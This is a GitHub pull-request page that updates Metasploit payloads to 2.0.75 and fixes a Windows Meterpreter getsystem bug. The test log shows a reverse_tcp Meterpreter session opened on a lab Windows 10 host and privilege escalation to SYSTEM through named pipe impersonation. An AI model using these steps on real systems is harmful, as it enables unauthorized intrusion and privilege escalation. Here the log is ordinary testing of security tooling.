Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Update metasploit payloads to 2.0.75 #16215

Merged
merged 1 commit into from
Feb 24, 2022
Merged

Update metasploit payloads to 2.0.75 #16215

merged 1 commit into from
Feb 24, 2022

Conversation

bwatters-r7
Copy link
Contributor

This PR updates payloads version to 2.0.75, taking in the changes landed in rapid7/metasploit-payloads#542
See payloads PR for testing instructions.

@bwatters-r7 bwatters-r7 self-assigned this Feb 23, 2022
@bwatters-r7
Copy link
Contributor Author 

msf6 payload(windows/x64/meterpreter/reverse_tcp) > [*] Sending stage (200262 bytes) to 10.5.132.153
[*] Meterpreter session 1 opened (10.5.135.101:4578 -> 10.5.132.153:49676 ) at 2022-02-24 10:47:44 -0600

msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN10X64-1511
OS              : Windows 10 (10.0 Build 10586).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN10X64-1511\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: 1346 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
meterpreter > sysinfo
Computer        : WIN10X64-1511
OS              : Windows 10 (10.0 Build 10586).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.5.132.153 - Meterpreter session 1 closed.  Reason: User exit
msf6 payload(windows/x64/meterpreter/reverse_tcp) > 
[*] Sending stage (200262 bytes) to 10.5.132.153
[*] Meterpreter session 2 opened (10.5.135.101:4578 -> 10.5.132.153:49686 ) at 2022-02-24 10:49:48 -0600

msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : WIN10X64-1511
OS              : Windows 10 (10.0 Build 10586).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > getsystem
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

For my future edification:
image

@bwatters-r7 bwatters-r7 merged commit 1e4e146 into rapid7:master Feb 24, 2022
@bwatters-r7
Copy link
Contributor Author

Release Notes

This PR updates payloads version to 2.0.75, taking in the changes landed in rapid7/metasploit-payloads#542 and fixes a bug in Windows Meterpreter getsystem command where a failed attempt to elevate can result in a partially-broken session.

@bwatters-r7 bwatters-r7 added bug payload rn-fix release notes fix and removed bug labels Feb 24, 2022
@bwatters-r7 bwatters-r7 deleted the bump-payloads-2.0.75 branch March 24, 2022 21:03
This pull request was closed.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@bwatters-r7 bwatters-r7

Labels
payload rn-fix release notes fix
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
1 participant
@bwatters-r7